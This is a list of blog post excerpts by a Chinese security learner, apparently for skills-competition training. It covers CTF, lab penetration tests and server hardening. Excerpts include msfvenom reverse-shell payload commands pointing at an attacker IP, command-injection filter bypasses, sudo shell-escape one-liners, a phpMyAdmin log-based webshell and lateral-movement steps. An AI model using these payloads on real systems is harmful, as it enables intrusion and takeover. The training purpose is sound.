shatianyzg
这个作者很懒,什么都没留下…
展开
-
phpmyadmin注入
用弱密码root/root登录phmyadmin。实验环境windows 2008 或win7。2.检测phpmyadmin有没有开启日志。刚开始不成功,选mysql数据库成功。以上一句话木马写入成功。原创 2023-03-13 20:30:47 · 193 阅读 · 0 评论 -
2023江苏网安系统加固题目
Options Indexes FollowSymLinks”,修改为“Options -Indexes ”即可。加固php,使php脚本只能访问/var/www/html/files目录。修改配置文件/etc/httpd/conf/httpd.conf。linux启用syn攻击保护,开启syn cookie内核参数。修改ssh配置文件,不允许 root运程登录。对 Apache进行加固,禁止目录列出。关闭mysql远程连接。原创 2023-03-13 17:48:50 · 277 阅读 · 0 评论 -
【内网渗透】Cobalt Strike搭建和使用
Cobalt Strike是一个神器。它可以共享一个攻击上下文供多个人使用,本身具有端口转发、木马生成等功能。我们可以使用Cobalt Strike进行钓鱼攻击、内网渗透等。原创 2023-02-20 19:56:43 · 1455 阅读 · 0 评论 -
WordPress 解题
通过wpscan –url http://172.16.100.11:7904 –enumerate u。用这个账号登录后台,漏洞点在media ,文件上传漏洞。IIS7 是我上传的图片,名是3.jpg。找到jerry/qwerty用户名密码。用中国蚁剑去连,成功。原创 2022-11-06 11:21:14 · 784 阅读 · 0 评论 -
针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)
利用Metasploit对HFS 2.3渗透攻击提权针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)原创 2022-10-30 18:01:02 · 1029 阅读 · 0 评论 -
利用 CVE-2017-0213 提权
VE-2017-0213 是一个比较冷门的COM 类型混淆 (Type Confusion)漏洞。巧妙的利用该漏洞,可以实现本地的提权。该漏洞由著名的Google Project zero 发现。以窗口(cmd)形式打开并执行命令查看一下现在权限whoami发现是system权限说明利用成功了。下面就简单演示一下利用CVE-2017-0213漏洞简单提权,利用 CVE-2017-0213 简单提权。利用 CVE-2017-0213 简单提权。首先下载CVE-2017-0213。接下来创建一个用户试试吧!原创 2022-10-22 16:03:38 · 254 阅读 · 0 评论 -
joomla 反序列化漏洞利用
实战:反序列化漏洞(CVE-2015-8562)原创 2022-10-16 15:38:34 · 485 阅读 · 0 评论 -
CTF之加密解密训练
下载地址: https : l/download.vulnhub.com/ha/isro.zip。创建账号hack405 密码pass123,并提权。登录 mysql -u root -p 密码为空。用python解码加密文件,得到hash。打开connect.php,发现是空白。访问bhaskara,下载一个文件。访问图片,没发现什么,看是否有隐藏。查看文件,是乱码,说明是加密了的。用gunzip解压压缩的密码字典。用steghide 工具打开隐藏。靶机:HA: ISRO。用dirb扫描敏感文件。原创 2022-09-25 13:09:01 · 511 阅读 · 0 评论 -
利用445 端口渗透
靶机win7 445开放 192…168.19.131。渗透kali 192.168.19.129。任务:如何知道win7 ip 地址。提权,将admin加入到管理员账户。135,138,139 蠕虫病毒。利用ms17_010漏洞渗透。kali远程登录到win7。2.破解win7 的账号。原创 2022-09-19 19:28:06 · 1230 阅读 · 0 评论 -
2022年国赛nginx 加固题
A- -2 2 任务二 x Nginx 安全策略( Linux )4.限制 HTTP 请求方式,只允许 GET、HEAD、POST;//指纹,版本号隐藏。7.将 Nginx 服务降权,使用 www 用户启动服务。//用户权限,需要先建www用户。3.禁止目录浏览和隐藏服务器版本和信息显示;5.设置客户端请求主体读取超时时间为 10;6.设置客户端请求头读取超时时间为 10;原创 2022-09-19 19:20:16 · 1853 阅读 · 0 评论 -
内网横向移动渗透(一)
靶机:Windows server2008 ip :172.16.100.31。靶机windows server 2008 ip:172.16.100.31。Windows 2008 IPC 攻防。Copy shell文件到目标靶机。创建计划任务运行时间为 17:32。用sc命令创建一个shell的服务。这里的1为创建计划任务时候的ID。将对方c$目录映射到本地磁盘z。新增计划任务,这里可以运行木马。用psExec.exe连接靶机。用type 命令输出执行结果。查询目标服务器上的时间。原创 2022-09-10 17:28:55 · 1145 阅读 · 0 评论 -
几道ctf 命令注入题目的解法
输入127.0.0.1 & cd flag_is_here;cat flag_138811873632297.php,找到flag。输入127.0.0.1%0als#,这里%0a在linux 代表空格,url编码,需要在浏览器中输入。用127.0.0.1;输入127.0.0.1;,空格,cat,flag,ctfhub。输入127.0.0.1%0als${IFS}fla*#将cat换成more命令,再查看源代码,找到flag。输入127.0.0.1;输入127.0.0.1;输入127.0.0.1%0acd。.原创 2022-08-26 13:22:05 · 1226 阅读 · 0 评论 -
几道文件包含漏洞ctf 题目解答
读取到一段字符串,去进行base64解码,在burpsuite中解码。用 cat /flag_20052查到flag。打开题目提示flag in /flag。抓包在 repeater里修改包,重放。用php://filter协议去读。访问php文件 发现有文件包含漏洞。...原创 2022-08-26 13:09:31 · 513 阅读 · 0 评论 -
两道简单密码题
发给Send to Intruder。去寻找官网端口来确认密码。原创 2022-08-16 15:32:34 · 142 阅读 · 0 评论 -
RCE远程命令执行web经典题型解答
输入127.0.0.1 & cd flag_is_here;cat flag_138811873632297.php,找到flag。输入127.0.0.1%0als#,这里%0a在linux 代表空格,url编码,需要在浏览器中输入。读取到一段字符串,去进行base64解码,在burpsuite中解码。输入127.0.0.1;,空格,cat,flag,ctfhub。将cat换成more命令,再查看源代码,找到flag。输入127.0.0.1;用 cat /flag_20052查到flag。...原创 2022-08-14 17:09:30 · 350 阅读 · 0 评论 -
ssh服务攻防与加固
3.创建一个用户名为exampleroot,作为替代root登录用, 将该新创建的用户添加到管理员组。8.SSH 连接的 IP 限制设置,只允许172.16.100.0网段访问ssh服务。关闭 TCP 端口转发和 X11 转发,防止黑客将这台机作为转发机器。5.修改 ssh 的登录端口号位为2222,并重新登录成功界面截图。2.禁用 root 用户登录,将配置语句作为flag提交。1.用nmap 扫描靶机的ssh增,将端口状态信息提交。修改/etc/hosts.allow加下面一行。...原创 2022-08-10 15:35:04 · 432 阅读 · 0 评论 -
技能大赛试题剖析:文件上传渗透测试
访问成功后上传名为backdoor.php的php一句话木马至服务器,打开控制台(使用vnc)使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false;4.上传使用weevely生成的木马backdoor1.php至服务器中,打开控制台使用网站安全狗检测本地是否存在木马,若检测出存在木马,则将木马所在的绝对路径作为Flag值提交,若未检测出木马则提交false;渗透机:(Kali Linux 2.0)用户名:root 密码:toor。..原创 2022-08-05 16:22:35 · 854 阅读 · 0 评论 -
B模块windows渗透
2.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将hydra使用的必要参数当做FLAG进行提交(例nmap-s-p22);3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将破解成功的密码当做FLAG进行提交;●攻击机服务器场景操作系统kali。...原创 2022-08-02 15:15:59 · 611 阅读 · 0 评论 -
技能大赛训练:A部分加固题目
修改vsftpd.conf将anounymous_enable改成NO。最大密码期限为15天,最小密码长度为8个字符。User1用户已经用md5加密了。禁止root用户ssh远程登录。修改ssh默认端口为2222。禁止管理员用户登录mysql。修改/etc/motd文件。同一ip这能打开2连接。删除默认数据库test。...原创 2022-08-01 11:36:20 · 823 阅读 · 0 评论 -
Telnet弱口令渗透测试
1.对靶机系统进行服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的服务端口信息截图。靶机windows7开启telnet,用最高管理员账户作为telnet账户。2.使用hydra工具对其暴力破解,密码字典自己写好名为pass.txt。4.利用破解出来的密码登录靶机,成功登录截图。3.将破解出来的密码界面截图。...原创 2022-07-31 16:08:21 · 827 阅读 · 0 评论 -
技能大赛训练题:登录安全加固
c.设置操作系统中的关键目录(system32、hosts、ProgramFiles、Perflogs)的权限为最优状态,即仅允许管理员用户进行读取及运行。deny表示设置普通用户和root用户连续错误登陆的最大次数,超过最大次数,则锁定该用户;a.设置user1用户只能在上班时间(周一至周五的900~1800可以登录,将user1的登录时间配置界面截图;root_unlock_time表示设定root用户锁定后,多少时间后自动解锁否则手动,单位是秒;...原创 2022-07-31 11:33:58 · 1069 阅读 · 0 评论 -
技能大赛训练题:MS15_034漏洞验证与安全加固
2.用burpsuite抓包分析是否存在ms15_034漏洞,抓包验证截图。1.安装iis7.5,用127.0.0.1访问,将访问页面截图。4.将测试结果进行截图,判断是否存在ms15_034漏洞。3.调用msf相应的测试模块进行扫描,将测试模块截图。靶机windows2008安装好iis7.5。5.使用拒绝服务模块,来进行测试,将模块名称截图。8.再次利用拒绝服务攻击,验证是否还存在漏洞。6.用拒绝服务模块进行攻击的结果进行截图。7.对靶机进行修补,将修补过程进行截图。...原创 2022-07-31 10:45:31 · 326 阅读 · 0 评论 -
技能大赛训练题:ftp 服务攻防与加固
5.用msf模块的ftp破解模块,破解靶机ftp账号与密码,账号字典与密码字典为user.txt,pass.txt,破解成功界面截图。1.靶机新建test1,test2,test3,test4,test5五个用户,密码与用户名相同。2.安装vsftpd,将ftp主目录设为/home,ftp登录账号为test1-test5。3.安装vsftpd服务,将安装好后启动vsftpd成功的命令截图。7.查看ftp登录日志,看那些用户非法登录过截图。8.删除ftp的登录用户名或修改密码为强密码。...原创 2022-07-31 10:40:23 · 368 阅读 · 0 评论 -
自制的数据库安全攻防题,相关靶机自己制作
4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用showoptions命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,…8.在上一题的基础上,使用第6题获取到的密码并进行提权,同时使用showoptions命令查看需要的配置,并配置CMD参数来查看系统用户,将配置的命令作为FLAG提交;5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;...原创 2022-07-30 09:54:05 · 245 阅读 · 0 评论 -
(RCE)远程代码/命令执行漏洞漏洞练习
说明各命令的执行给果,不会影响其它命令的执行。换句话说,各个命令都会执行,但不保证每个命令都执行成功。说明若前面的命令执行成功,才会去执行后面的命令。这样可以保证所有的命令执行完毕后,执行过程都是成功的。说明||是或的意思,只有前面的命令执行失败后才去执行下一条命令,直到执行成功一条命令为止。查看phpinfo,发现以下字段,证明是可以使用php//input的。查看phpinfo,发现以下字段,证明是可以使用php//input的。根据提示,过滤了空格,使用...原创 2022-07-29 20:31:21 · 160 阅读 · 0 评论 -
oscp raven2靶机渗透过程
信息侦察阶段用dirb扫描发现以下信息---- Entering directory: http://172.16.100.142/vendor/ ----(!) WARNING: Directory IS LISTABLE. No need to scan it.(Use mode ‘-w’ if you want to scan it anyway)找到第一个flag寻找PHPMailer 5.2.16 的expsearchsploit phpmailer拷贝exp到当前目录利用40原创 2022-07-05 13:46:24 · 438 阅读 · 0 评论 -
sudo提权
Sudo 提权命令udo /usr/bin/awk ‘BEGIN {system(“/bin/bash”)}’获取shell/usr/bin/curl获取shellfind . -exec /bin/sh ; -quit可以发现,哪怕是find这种查找命令被赋予了sudo,也能够瞬间提权为root权限,只要我们能够巧妙的利用执行这些命令...原创 2022-06-24 21:27:45 · 852 阅读 · 0 评论 -
加密压缩文件解密技巧
fcrackzip zip加密文件解密工具从网上下载 zip格式的文件,需要解压,但不知道密码,需要微信支付,才发密码给你。如何自己能够解开Fcrackzip可以破解这类密码,kali中有使用帮助部分重要参数的说明:-b 指定为暴力破解-D 指定字典来暴力破解-c 指定字符集,字符集 格式只能为 -c ‘aA1!:’a 表示小写字母[a-z]A 表示大写字母[A-Z]1 表示阿拉伯数字[0-9]-l 指定密码长度,如:-l 1-5-u 只显示破解出来的密码,其他错误的密码不显示出Fcrackzip –原创 2022-06-21 10:12:02 · 484 阅读 · 0 评论 -
pikachu的一些关卡测试
一、完成Pikachu渗透测试靶机平台以下SQL注入实验,分析漏洞产生原因(代码分析),并以图文方式描述渗透测试过程。(1)字符型注入get(使用手工注入,获取到密码信息即可)输入test,提示不存在输入test’ or 1=1 #,返回uid及邮箱,结果会将数据库表中的东西遍历出来。query="selectid,emailfrommemberwhereusername=′query="select id,email from member where username='query="select原创 2022-06-15 21:05:16 · 500 阅读 · 0 评论 -
使用https加密攻击
攻击机:kali 192.168.241.128靶机:win7 192.168.241.130Openssl 使用帮助2.生成 HTTPS 的 payload(生成的payload需要经过免杀处理)msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.241.128 lport=7777 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem PayloadUU原创 2022-06-13 16:51:13 · 110 阅读 · 0 评论 -
msf生成linux elf木马反弹shell
攻击机:Kali 192.168.241.128靶机:centos 7 192.168.241.129msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释:inux/x64/meterpreter/reverse_tcp //这是反弹的payloadLHOST=xxx.xxx.xxx.xxx //这里写kali的ipLPORT //写k原创 2022-06-13 16:48:08 · 1796 阅读 · 0 评论 -
iis6.0远程代码执行漏洞复现
iis6.0远程代码执行漏洞复现(CVE-2017-7269)实验环境搭建1.目标机:windows server 2003 r2需要目标服务器开启WebDAV靶机IP:192.168.75.134Kali IP : 192.168.75.129kali中启动Msf,使用CVE-2017-7269攻击插件use exploit/windows/iis/cve_2017_7269没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269 下原创 2022-06-12 15:27:49 · 632 阅读 · 0 评论 -
中职空间安全比赛经典数据包分析题
1.使用Wireshark查看并分析Kali桌面下的logs.pcapng数据包文件,通过分析数据包logs.pcapng找出恶意用户目录扫描的第9个文件,并将该文件名作为FLAG(形式:[robots.txt])提交;flag:[star.php]通过过滤条件设置为http,找到第九个文件为start.php,扫描的文件从1-9 分别为.admin.html, admin.php, index.html, get.htm, aspadmin.php, changepwd.php,admin_ind原创 2022-06-09 22:09:41 · 282 阅读 · 0 评论 -
通过ftp 漏洞获取系统的权限
环境:攻击机kali ip:192.168.146.132靶机: metasploitble21.通过扫描获取系统的ip通过扫描知道靶机操作系统linux ,ip :192.168.146.133这里通过输入whoami,知道拿到了系统最高权限root权限,但没有交互窗口输入python -c 'import pty; pty.spawn(“/bin/bash”)'出现交互窗口...原创 2022-06-09 20:11:51 · 526 阅读 · 0 评论 -
暴力破解表单验证
环境:win7安装pikachu (靶机)攻击机 kali1.pikachu安装pikachu靶场解压pikachu-master,重命名pikachu将压缩包解压到phpstudy目录下www目录中。4.打开pikachu:访问127.0.0.1后出现:点击pikachu进行数据库连接(若出现):#打开pikachu中inc目录下的config.inc:将第二行空白处加入root:保存后在进行数据库连接即可成功。3.进行初始化安装4.学习目标:暴力破解表单,获得用户名密码5.用kali原创 2022-06-08 13:18:16 · 117 阅读 · 0 评论 -
利用nfs共享漏洞获取系统文件
环境:win7攻击机 192.168.241.131Centos 7 靶机 192.168.241.128配置靶机的ip地址Vim /etc/exports[root@localhost nfs]# chmod -R 777 /nfs关闭firewall及selinuxroot@localhost nfs]# systemctl stop firewalld[root@localhost nfs]# systemctl disable firewalldVim /etc/selinux/conf原创 2022-06-06 16:31:30 · 328 阅读 · 0 评论 -
任务4. Windows操作系统渗透测试解题思路
任务环境说明:服务器场景:PYsystem4服务器场景操作系统:Windows(版本不详)1.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;(6分)提示利用ms08_067漏洞进行msf渗透发现存在445漏洞Flag:Microsoft Windows XP|20032.通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行系统服务及版本扫描渗透测试,并将该操作显示结果原创 2022-06-05 13:51:39 · 720 阅读 · 0 评论 -
任务三:Windows操作系统渗透测试
任务环境说明:服务器场景:Windows服务器场景操作系统:Windows(版本不详)渗透机场景:Kali渗透机场景用户名:root,密码:toor1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;Microsoft Windows 7|2008|8.12.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应原创 2022-06-04 15:27:49 · 1499 阅读 · 0 评论 -
一道中职空间安全SSH弱口令渗透测试题解题思路
任务环境说明:服务器场景:Linux服务器场景操作系统:Linux(版本不详)渗透机场景:BT5渗透机场景用户名:root,密码:toor1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交(忽略ip地址);flag=-p21,22,232.通过本地PC中渗透测试平台BT5对服务器场景Linux进行系统服原创 2022-06-04 11:55:00 · 429 阅读 · 0 评论 -
一道中职空间安全Web信息收集题解答
说明:本题只给出解题方法,可能实际靶机的ip与我解题的ip不同任务环境说明:服务器场景:Linux服务器场景操作系统:Linux(版本不详)渗透机场景:Kali渗透机场景用户名:root,密码:toor2. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器8180端口,检测其开放状态),并将该操作使用命令中固定不变的字符串作为Flag提交(目标地址以http://10.10.10.1来表示);nikto -port 8180 -h原创 2022-06-03 22:46:46 · 188 阅读 · 0 评论